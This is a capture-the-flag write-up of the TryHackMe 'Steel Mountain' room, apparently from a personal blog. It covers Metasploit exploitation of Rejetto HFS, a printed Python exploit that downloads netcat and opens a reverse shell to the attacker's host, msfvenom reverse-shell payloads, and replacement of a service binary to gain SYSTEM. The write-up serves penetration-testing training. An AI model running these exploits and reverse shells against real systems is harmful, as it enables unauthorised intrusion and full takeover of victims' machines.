Skip to main content

Steel Mountain writeup [thm]

pic

Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.

Steel Mountain is the first challenge in the Advanced Exploitation section of the Offensive Pentesting path.

This posts contains some spoilers.


Let's get started!

Introduction

In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

Who is the employee of the month?

Visit $target in a web browser. There's our employee of the month. If you don't recognize this man, have a look at the filename or do a reverse image search.

“Think about it [REDACTED]. If you died, would anyone care? Would they really care? Maybe they’d cry for a day, but let’s be honest. No one would give a shit. They wouldn’t. The few people who would feel obligated to go to your funeral would probably feel annoyed and leave as soon as possible. That’s who you are. That’s what you are. You’re nothing to anyone. To everyone. Think about it, [REDACTED], cause if you do, if you let yourself. You know I’m telling you the truth, so instead of wasting anymore of my time, I need you to go call someone that matters. Because [REDACTED], you don’t.”

😿

Task 2 Initial Access

Now you have deployed the machine, lets get an initial shell!

Scan the machine with nmap. What is the other port running a web server on?

$: nmap -p- $target                                             
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-23 15:55 CEST
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Nmap scan report for $target
Host is up (0.051s latency).
Not shown: 65520 closed ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
8080/tcp  open  http-proxy
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49164/tcp open  unknown
49165/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 113.56 seconds

The answer is easy to figure out.

Take a look at the other web server. What file server is running?

Server information
HttpFileServer 2.3
Server time: 5/23/2021 6:59:01 AM
Server uptime: 00:09:02 

With a link to http://www.rejetto.com/hfs/.

This Rejetto HFS probably has a vulnerability we will exploit to gain initial access to the machine.

What is the CVE number to exploit this file server?

$: searchsploit hfs    
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                           |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service                                                                                                                        | osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)                                                                                                                                  | osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure                                                                                                                              | osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation                                                                                                                       | osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                                                                                                                               | windows/remote/37985.py
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)                                                                                                                              | windows/remote/49584.py
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)                                                                                                                              | multiple/remote/48569.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service                                                                                                                              | linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)                                                                                                                   | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities                                                                                                                        | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                                                                                           | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                                                                                      | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                                                                                                      | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                                                                                                 | windows/webapps/34852.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Given that we know that we are going to use Metasploit it's not hard to find the right one. We can look in Exploit-DB for some more info on the exploit: Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)

EDB-ID: 34926
CVE: [REDACTED]

Use Metasploit to get an initial shell. What is the user flag?

$: msfconsole init
[!] The following modules could not be loaded!..|
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] Please see /home/[REDACTED]/.msf4/logs/framework.log for details.

                                              `:oDFo:`                            
                                           ./ymM0dayMmy/.                                                                                                                                                                  
                                        -+dHJ5aGFyZGVyIQ==+-                                                                                                                                                               
                                    `:sm⏣~~Destroy.No.Data~~s:`                                                                                                                                                            
                                 -+h2~~Maintain.No.Persistence~~h+-                                                                                                                                                        
                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`                                                                                                                                                     
                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.                                                                                                                                                 
                       -++SecKCoin++e.AMd`       `.-://///+hbove.913.ElsMNh+-                                                                                                                                              
                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-                                                                                                                                             
                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:                                                                                                                                             
                      :we're.all.alike'`                     The.PFYroy.No.D7:                                                                                                                                             
                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:                                                                                                                                             
                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:                                                                                                                                             
                      :---srwxrwx:-.`                        `MS146.52.No.Per:                                                                                                                                             
                      :<script>.Ac816/                        sENbove3101.404:                                                                                                                                             
                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:                                                                                                                                             
                      :09.14.2011.raid                       /STFU|wall.No.Pr:                                                                                                                                             
                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:                                                                                                                                             
                      :#OUTHOUSE-  -s:                       /corykennedyData:                                                                                                                                             
                      :$nmap -oS                              SSo.6178306Ence:                                                                                                                                             
                      :Awsm.da:                            /shMTl#beats3o.No.:                                                                                                                                             
                      :Ring0:                             `dDestRoyREXKC3ta/M:                                                                                                                                             
                      :23d:                               sSETEC.ASTRONOMYist:                                                                                                                                             
                       /-                        /yo-    .ence.N:(){ :|: & };:                                                                                                                                             
                                                 `:Shall.We.Play.A.Game?tron/                                                                                                                                              
                                                 ```-ooy.if1ghtf0r+ehUser5`                                                                                                                                                
                                               ..th3.H1V3.U2VjRFNN.jMh+.`                                                                                                                                                  
                                              `MjM~~WE.ARE.se~~MMjMs                                                                                                                                                       
                                               +~KANSAS.CITY's~-`                                                                                                                                                          
                                                J~HAKCERS~./.`                                                                                                                                                             
                                                .esc:wq!:`                                                                                                                                                                 
                                                 +++ATH`                                                                                                                                                                   
                                                  `                                                                                                                                                                        


       =[ metasploit v6.0.36-dev                          ]
+ -- --=[ 2106 exploits - 1131 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: To save all commands executed since start up 
to a file, use the makerc command

Then we search for the exploit:

msf6 > search Rejetto HTTP File Server 

Matching Modules
================

   i  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec

Use it!

msf6 exploit(windows/http/rejetto_hfs_exec) > use exploit/windows/http/rejetto_hfs_exec
[*] Using configured payload windows/meterpreter/reverse_tcp

Let's have a look at the options.

msf6 exploit(windows/http/rejetto_hfs_exec) > options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     [REDACTED]       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

We need to set RHOSTS, SRVHOST(?) and LHOST which was set to my real local 192.169.x.x address. Both the port number and the path on the target and all the other required options looks fine.

msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS $target
RHOSTS => $target
msf6 exploit(windows/http/rejetto_hfs_exec) > set SRVHOST tun0
SRVHOST => tun0
msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST tun0
LHOST => tun0

We are now ready to pwn this machine.

msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on $tunip:4444 
[*] Using URL: http://$tunip:8080/hKz2pL
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /hKz2pL
[*] Sending stage (175174 bytes) to $target
[*] Meterpreter session 1 opened ($tunip:4444 -> $target:49188) at 2021-05-23 16:57:07 +0200
[!] Tried to delete %TEMP%\FgXtiY.vbs, unknown result
[*] Server stopped.

meterpreter > 

We're in! Let's grab the user flag.

meterpreter > pwd
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
meterpreter > cd c:\users\bill
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-09-27 13:07:07 +0200  desktop.ini
100666/rw-rw-rw-  70    fil   2019-09-27 14:42:38 +0200  user.txt

meterpreter > cat user.txt 
[REDACTED]

It is done.

Privilege Escalation

Now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root!

To enumerate this machine, we will use a powershell script called PowerUp, that's purpose is to evaluate a Windows machine and determine any abnormalities - "PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations."

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

First we download the script to our local machine.

$: wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

Then we upload it to our target.

meterpreter > upload PowerUp.ps1
[*] uploading  : /home/[REDACTED]/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 483.26 KiB of 483.26 KiB (100.0%): /home/[REDACTED]/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded   : /home/[REDACTED]/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1

meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  494860  fil   2021-05-23 17:23:12 +0200  PowerUp.ps1
100666/rw-rw-rw-  282     fil   2019-09-27 13:07:07 +0200  desktop.ini
100666/rw-rw-rw-  70      fil   2019-09-27 14:42:38 +0200  user.txt

We execute the following to command to get a PowerShell... shell.

meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > dir


    Directory: C:\Users\bill\Desktop


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         5/23/2021   8:23 AM     494860 PowerUp.ps1
-a---         9/27/2019   5:42 AM         70 user.txt

We run the script:

PS > . .\PowerUp.ps1

PS > Invoke-AllChecks

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN/bill;
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe;
                 IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False
Name           : AWSLiteAgent
Check          : Unquoted Service Paths

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False
Name           : AWSLiteAgent
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN/bill;
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe;
                 IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe;
                 IdentityReference=STEELMOUNTAIN/bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName                     : AdvancedSystemCareService9
Path                            : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart                      : True
Name                            : AdvancedSystemCareService9
Check                           : Modifiable Service Files

ServiceName                     : IObitUnSvr
Path                            : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN/bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'IObitUnSvr'
CanRestart                      : False
Name                            : IObitUnSvr
Check                           : Modifiable Service Files

ServiceName                     : LiveUpdateSvc
Path                            : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN/bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'LiveUpdateSvc'
CanRestart                      : False
Name                            : LiveUpdateSvc
Check                           : Modifiable Service Files

Take close attention to the CanRestart option that is set to true. What is the name of the name of the service which shows up as an unquoted service path vulnerability?

The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

AdvancedSystemCareService9 looks promising:

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

Use msfvenom to generate a reverse shell as an Windows executable.

$: msfvenom -p windows/shell_reverse_tcp LHOST=$tunip LPORT=1234 -e x86/shikata_ga_nai -f exe -o ASCService.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: ASCService.exe

Upload your binary and replace the legitimate one. Then restart the program to get a shell as root.

Note: The service showed up as being unquoted (and could be exploited using this technique), however, in this case we have exploited weak file permissions on the service files instead.

meterpreter > upload ASCService.exe
[*] uploading  : /home/[REDACTED]/tryhackme/steel_mountain/ASCService.exe -> ASCService.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /home/[REDACTED]/tryhackme/steel_mountain/ASCService.exe -> ASCService.exe
[*] uploaded   : /home/[REDACTED]/tryhackme/steel_mountain/ASCService.exe -> ASCService.exe

First, we shut down AdvancedSystemCareService9.

C:\Users\bill\Desktop>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Now, replace ASCService.exe with our malicious impostor program.

C:\Users\bill\Desktop>
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
Overwrite \Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe? (Yes/No/All): Y
Y
        1 file(s) copied.

Start a listener on our local machine.

$: nc -nlvp 1234     

Then restart the AdvancedSystemCareService9.

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

That doesn't sound very promising but when we check in on our listener we got a shell and not any plain old shell, we got root.

C:\Program Files (x86)\IObit>
C:\Program Files (x86)\IObit>whoami
whoami
nt authority\system

C:\Windows\System32>cd C:\Users\Administrator\Desktop\
cd C:\Users\Administrator\Desktop\

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A

 Directory of C:\Users\Administrator\Desktop

10/12/2020  12:05 PM    <DIR>          .
10/12/2020  12:05 PM    <DIR>          ..
10/12/2020  12:05 PM             1,528 activation.ps1
09/27/2019  05:41 AM                32 root.txt
               2 File(s)          1,560 bytes
               2 Dir(s)  44,155,334,656 bytes free

C:\Users\Administrator\Desktop>more root.txt    
more root.txt
[REDACTED]

Access and Escalation Without Metasploit

Now let's complete the room without the use of Metasploit.

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to

To begin we shall be using the same CVE. However, this time let's use this exploit.

Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub! You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

The exploit is a short script written in Python2.

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#          It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#          It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!


import urllib2
import sys

try:
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

    ip_addr = "$tunip" #local IP address
    local_port = "443" # Local Port number

    # Updated Line
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%3A8080%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""

The vbs line was changed in the script according this.

To start things off, download the netcat static binary and change its name to nc.exe to conform with the exploit. Then serve it up by executing the following while standing in the same directory where you have the netcat binary.

$: python3 -m http.server 8080   

Also start listening on port 443.

$: sudo rlwrap nc -nlvp 443
listening on [any] 443 ...

Now it's time to try out the exploit.

$: python2 exploit.py $target 8080

No output but in the Python web server we see that we got a GET request for the netcat binary.

$target - - [23/May/2021 19:00:54] "GET /nc.exe HTTP/1.1" 200 -

Looks good!

And in the listener we see something that should make us smile.

connect to [$tunip] from (UNKNOWN) [$target] 49391
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>

We are in!

Congratulations, we're now onto the system. Now we can pull winPEAS to the system using powershell -c.

Once we run winPeas, we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.

What powershell -c command could we run to manually find out the service name?

powershell -c "Get-Service"

Now let's escalate to Administrator with our new found knowledge.

Generate your payload using msfvenom and pull it to the system using powershell.

Format is "powershell -c "command here"

Download the winPEAS script to web server directory.

$: wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat

Make sure that the Python web server is up and running.

cd C:\Users\bill\Desktop
C:\Users\bill\Desktop>

powershell -c "Invoke-WebRequest -Uri 'http://$tunip:8080/winPEAS.bat' -OutFile 'C:\Users\bill\Desktop\winPEAS.bat'"

In the web server we see a GET request.

$target - - [07/Feb/2021 22:27:52] "GET /winPEAS.bat HTTP/1.1" 200 -
dir
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A

 Directory of C:\Users\bill\Desktop

05/23/2021  10:11 AM    <DIR>          .
05/23/2021  10:11 AM    <DIR>          ..
05/23/2021  09:05 AM            73,802 ASCService.exe
05/23/2021  08:28 AM           494,731 PowerUp.ps1
09/27/2019  05:42 AM                70 user.txt
05/23/2021  10:11 AM            35,107 winPEAS.bat
               4 File(s)        603,710 bytes
               2 Dir(s)  44,150,620,160 bytes free

It worked. Let's run winPEAS.bat.

winPEAS.bat

            ((,.,/((((((((((((((((((((/,  */

 [+] SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe STEELMOUNTAIN\bill:(I)(RX,W)                                                                                                                               
C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Program Files\Amazon\XenTools\LiteAgent.exe NT AUTHORITY\SYSTEM:(I)(F)
...

A very long and familiar output. Since we did all this before and know what to do there is no need to go through it again.

Time to bake up some malicious code.

$: msfvenom -p windows/shell_reverse_tcp LHOST=$tunip LPORT=1234 -e x86/shikata_ga_nai -f exe -o ASCService.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: ASCService.exe

Start a listener.

$: nc -nlvp 1234 
listening on [any] 1234 ...

Stop AdvancedSystemCareService9.

sc stop AdvancedSystemCareService9

Upload and replace ASCService.exe.

powershell -c "Invoke-WebRequest -Uri 'http://$tunip:8080/Advanced.exe' -OutFile 'C:/Program Files (x86)/IObit/Advanced.exe'"

Finally, start AdvancedSystemCareService9.

